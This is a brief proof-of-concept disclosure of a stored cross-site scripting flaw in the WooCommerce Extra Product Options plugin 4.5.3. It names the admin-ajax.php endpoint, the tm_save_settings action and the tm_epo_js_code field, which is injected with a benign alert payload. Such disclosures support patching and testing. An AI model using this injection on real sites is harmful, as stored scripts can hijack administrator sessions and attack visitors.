WooCommerce Extra Product Options 4.5.3 Stored XSS

by WpHutte.com

Notes:

Tested on WordPress 4.8

Settings:

Target URL:
* Note, /wp-admin/admin-ajax.php gets appended automatically if needed

The Form

Form Field Name POC Data Input field
action tm_save_settings
tm_epo_js_code alert(888)

POC by WPHutte.com